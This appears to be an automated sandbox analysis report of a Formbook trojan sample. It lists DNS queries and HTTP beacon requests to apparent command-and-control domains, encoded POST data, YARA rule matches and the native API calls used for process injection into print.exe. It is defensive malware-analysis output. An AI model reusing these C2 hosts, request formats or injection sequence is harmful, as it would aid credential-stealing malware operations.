Source: global traffic, HTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=WwxZJefTXlbC80/BpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790/Sw0PUDFf+oDAGEaENhNNwIZQ== HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.sportspaj.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?4f2t8=3m5S8RLi2FvoSMlAd2YNW/TJwuNR/4L3lTg0ZykUeQS0d3bBVkf5OCtf3wLO2p5Qie0G5ZQmXW/kTWMxHN/hjFLiWPmpcdZuTA==&nFeHa=dbNpTj HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.noobblaster.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
                    Source: global traffic DNS traffic detected: DNS query: www.7789552398763.net
                    Source: global traffic DNS traffic detected: DNS query: www.pheonix-travels.com
                    Source: global traffic DNS traffic detected: DNS query: www.nexgen-gaming.com
                    Source: global traffic DNS traffic detected: DNS query: www.theranchobizarro.com
                    Source: global traffic DNS traffic detected: DNS query: www.heilao9.xyz
                    Source: global traffic DNS traffic detected: DNS query: www.sciencebot.sbs
                    Source: global traffic DNS traffic detected: DNS query: www.gpcamservices.com
                    Source: global traffic DNS traffic detected: DNS query: www.slimdut.top
                    Source: global traffic DNS traffic detected: DNS query: www.otomain.info
                    Source: global traffic DNS traffic detected: DNS query: www.uty803.com
                    Source: global traffic DNS traffic detected: DNS query: www.mlfloor.net
                    Source: global traffic DNS traffic detected: DNS query: www.nathanladd.software
                    Source: global traffic DNS traffic detected: DNS query: www.defengnm.com
                    Source: global traffic DNS traffic detected: DNS query: www.hugelmann.org
                    Source: global traffic DNS traffic detected: DNS query: www.sportspaj.com
                    Source: global traffic DNS traffic detected: DNS query: www.noobblaster.com
                    Source: unknown HTTP traffic detected: POST /fgkz/ HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: en-us Host: www.nexgen-gaming.com Connection: close Content-Length: 186 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Origin: http://www.nexgen-gaming.com Referer: http://www.nexgen-gaming.com/fgkz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Ascii: 4f2t8=G375BnSlYdYzWbbs7NH4CfMk6lu/M+V0Tuan3I1TlozLfce0YubXjlCqbvV1dodxYDtb++7V+xDf2jkB3/DXZxy/d33+O5xXsdmCKil8i2nq3I2u4ZlROnuAFi16fF165KVXcXshzi3ObOYLlvRIWcvKiSkHpUO+7/gtACRqutalQrVu0w==
                    Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.13.3 Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache, private date: Fri, 30 Aug 2024 05:19:05 GMT Content-Encoding: gzip
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.13.3 Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache, private date: Fri, 30 Aug 2024 05:19:07 GMT Content-Encoding: gzip
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.13.3 Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache, private date: Fri, 30 Aug 2024 05:19:10 GMT Content-Encoding: gzip
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.13.3 Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache, private date: Fri, 30 Aug 2024 05:19:13 GMT
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 30 Aug 2024 05:19:42 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 30 Aug 2024 05:19:44 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 30 Aug 2024 05:19:47 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 30 Aug 2024 05:19:49 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 30 Aug 2024 05:20:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ts2nI1Oby4%2FtQ4omscmXl732VVJHxcLU6pMCmLXJXnzzcRhTvv9hoCaNNRsC4sOFvYvOF1U%2F9aYZFU0WKuqgDJddEPsrVtzM%2FVDQbxmf%2FwgvKcErBIWz6mvlZbgPkHkQ7SFT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8bb254fa1ccc7c9c-EWRContent-Encoding: gzipData Raw: 38 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 2c c7 ae 34 9a a0 eb 78 51 ef a6 89 51 3b 68 83 a2 30 38 c3 3b 1a c6 14 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 c3 57 6f 3f 5c dc 7e ba be 84 cc 2d 64 d4 0a 5f 51 fa 9b 48 41 3a b8 ba 84 b3 df 23 08 fd 00 24 92 59 3b 23 4a d3 cf 16 04 be 06 2d b9 40 02 92 a9 f9 8c a0 a2 1f 6f 48 04 e1 ab df 50 71 91 fe 4e e9 93 a8 4a 0e c0 71 51 67 df 26 ea fc 05 51 e7 df 20 6a ee 2a 69 be e3 98 95 87 52 28 dd 95 94 21 e3 51 2b 74 c2 49 8c de be bf 81 5c 0b e5 2c 38 0d b9 d1 99 88 85 43 0e 57 d7 f0 27 ac d7 eb be 76 7a c1 84 ea 0b 95 6a f8 13 2e a4 5e f2 54 32 83 61 50 8a 68 85 0b 74 0c 92 8c 19 8b 6e 46 3e de fe 8b 9e 13 08 ea 81 cc b9 9c e2 1f 4b b1 9a 91 0b ad 1c 2a 47 6f 37 39 12 48 ca d6 8c 38 7c 70 81 37 65 ba 15 f3 92 94 5f e9 c7 1f e8 85 5e e4 cc 89 58 36 05 5d 5d ce 2e f9 1c 1b eb 14 5b e0 8c 18 1d 6b 67 1b 13 95 16 8a e3 43 0f 94 4e b5 94 7a 7d b0 64 25 70 9d 6b e3 1a 8b d6 82 bb 6c c6 71 25 12 a4 45 a3 27 94 70 82 49 6a 13 26 71 36 2c a5 48 a1 ee c1 a0 9c 11 eb 36 12 6d 86 e8 08 08 3e 
23 49 7a 57 76 d1 c4 5a 02 99 c1 74 46 82 84 2b 9a cc 45 50 0e 05 85 bb 8b f1 20 6a b5 5a a1 4d Data Ascii: 88cXko7_qT5,4xQQ;h08;9%)B<n`_qxyxWo?\~-d_QHA:#$Y;#J-@oHPqNJqQg&Q j*iR(!Q+tI\,8CW'vzj.^T2aPhtnF>K*Go79H8|p7e_^X6]].[kgCNz}d%pklq%E'pIj&q6,H6m>#IzWvZtF+EP jZM
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 403 Forbidden
                        Date: Fri, 30 Aug 2024 05:20:32 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options: SAMEORIGIN
                        Referrer-Policy: same-origin
                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DdYoLHquPxfvO8Xz9kVUebCgSzPF32K607u1mB7TGBaQBmT1uTzn1nOuHC0ro6oVE1NZ7srYw%2Bskcw8FZ4T3sAVZuQsqmHPqFPN4t3KgGMytwH6YYkHvNtE3kl52t12ZidTA"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Vary: Accept-Encoding
                        alt-svc: h3=":443"; ma=86400
                        CF-Cache-Status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 8bb25509fbf57cab-EWR
                        Content-Encoding: gzip
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 403 Forbidden
                        Date: Fri, 30 Aug 2024 05:20:35 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options: SAMEORIGIN
                        Referrer-Policy: same-origin
                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9oKK3Fx0eK3F%2B5XuPMwyyK5L1R3DXCj2RSMMfW9S1sP1WwmrBi3K3cgWjwUKICYwnoqIVLHPWH606WiK8K3fagLlk3V6IViUuruPn2O8l4YYa50scFBGPAf9c6XID%2Fjz9LS"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Vary: Accept-Encoding
                        alt-svc: h3=":443"; ma=86400
                        CF-Cache-Status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 8bb25519a8b61a1b-EWR
                        Content-Encoding: gzip
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 403 Forbidden
                        Date: Fri, 30 Aug 2024 05:20:37 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options: SAMEORIGIN
                        Referrer-Policy: same-origin
                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4VTd3e2kN%2BX4JlJqO1c9KRzoroOiyYw%2BJlzDiSSgMDeX5Jdwns%2FI%2BKn4pvDkmdTolQexX2IBEj%2BGvGC6btTaSdOirvtVWw6FswpIkZWgdr2a0r7ILG5OioTyW%2BX5W7CX8e7k"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Vary: Accept-Encoding
                        alt-svc: h3=":443"; ma=86400
                        CF-Cache-Status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 8bb255297edb43fb-EWR
                        Data Ascii: 17ba<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>DNS points to prohibited IP | www.otomain.info | Cloudflare</title><meta charset="UTF-8" /><m
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 30 Aug 2024 05:20:43 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: close
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 30 Aug 2024 05:20:46 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: close
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 30 Aug 2024 05:20:48 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: close
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 30 Aug 2024 05:20:51 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: close
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 403 Forbidden
                        content-length: 93
                        cache-control: no-cache
                        content-type: text/html
                        connection: close
                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        content-type: text/html; charset=UTF-8
                        x-request-id: 78244037-ccc2-4297-85d4-ff9e3a2f927c
                        x-runtime: 0.036430
                        content-length: 16984
                        connection: close
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        content-type: text/html; charset=UTF-8
                        x-request-id: 6cc8d1b1-c997-4ad8-b0ba-aee70f1a65fa
                        x-runtime: 0.029674
                        content-length: 17007
                        connection: close
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        content-type: text/html; charset=UTF-8
                        x-request-id: 6423d2d3-1d81-406a-820f-58718bafdc34
                        x-runtime: 0.038536
                        content-length: 18019
                        connection: close

                    E-Banking Fraud

                    Source: Yara match, File source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    Source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                    Source: UnmxRI.exe, frmMain.cs, Long String: Length: 185344
                    Source: tehuvFgZlLZK.exe.0.dr, frmMain.cs, Long String: Length: 185344
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_0040B853 NtAllocateVirtualMemory,9_2_0040B853
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_0040A943 NtCreateSection,9_2_0040A943
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_0040A103 NtGetContextThread,9_2_0040A103
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_0040AB63 NtMapViewOfSection,9_2_0040AB63
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_0040A313 NtSetContextThread,9_2_0040A313
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_0040B433 NtDelayExecution,9_2_0040B433
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_0040A523 NtResumeThread,9_2_0040A523
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_0040AD93 NtCreateFile,9_2_0040AD93
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_00428603 NtClose,9_2_00428603
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_00409EF3 NtSuspendThread,9_2_00409EF3
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_0040AFC3 NtReadFile,9_2_0040AFC3
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2B60 NtClose,LdrInitializeThunk,9_2_018E2B60
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_018E2DF0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_018E2C70
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E35C0 NtCreateMutant,LdrInitializeThunk,9_2_018E35C0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E4340 NtSetContextThread,9_2_018E4340
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E4650 NtSuspendThread,9_2_018E4650
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2B80 NtQueryInformationFile,9_2_018E2B80
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2BA0 NtEnumerateValueKey,9_2_018E2BA0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2BE0 NtQueryValueKey,9_2_018E2BE0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2BF0 NtAllocateVirtualMemory,9_2_018E2BF0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2AB0 NtWaitForSingleObject,9_2_018E2AB0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2AD0 NtReadFile,9_2_018E2AD0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2AF0 NtWriteFile,9_2_018E2AF0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2DB0 NtEnumerateKey,9_2_018E2DB0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2DD0 NtDelayExecution,9_2_018E2DD0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2D00 NtSetInformationFile,9_2_018E2D00
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2D10 NtMapViewOfSection,9_2_018E2D10
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2D30 NtUnmapViewOfSection,9_2_018E2D30
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2CA0 NtQueryInformationToken,9_2_018E2CA0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2CC0 NtQueryVirtualMemory,9_2_018E2CC0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2CF0 NtOpenProcess,9_2_018E2CF0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2C00 NtQueryInformationProcess,9_2_018E2C00
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2C60 NtCreateKey,9_2_018E2C60
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2F90 NtProtectVirtualMemory,9_2_018E2F90
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2FA0 NtQuerySection,9_2_018E2FA0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2FB0 NtResumeThread,9_2_018E2FB0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2FE0 NtCreateFile,9_2_018E2FE0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2F30 NtCreateSection,9_2_018E2F30
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2F60 NtCreateProcessEx,9_2_018E2F60
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2E80 NtReadVirtualMemory,9_2_018E2E80
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2EA0 NtAdjustPrivilegesToken,9_2_018E2EA0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2EE0 NtQueueApcThread,9_2_018E2EE0
                    Source: C:\Users\user\Desktop\UnmxRI.exe, Code function: 9_2_018E2E30 NtWriteVirtualMemory,9_2_018E2E30
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E3090 NtSetValueKey,9_2_018E3090
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E3010 NtOpenDirectoryObject,9_2_018E3010
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E39B0 NtGetContextThread,9_2_018E39B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E3D10 NtOpenProcessToken,9_2_018E3D10
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E3D70 NtOpenThread,9_2_018E3D70
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E74340 NtSetContextThread,LdrInitializeThunk,16_2_02E74340
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E74650 NtSuspendThread,LdrInitializeThunk,16_2_02E74650
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72AF0 NtWriteFile,LdrInitializeThunk,16_2_02E72AF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72AD0 NtReadFile,LdrInitializeThunk,16_2_02E72AD0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72BE0 NtQueryValueKey,LdrInitializeThunk,16_2_02E72BE0
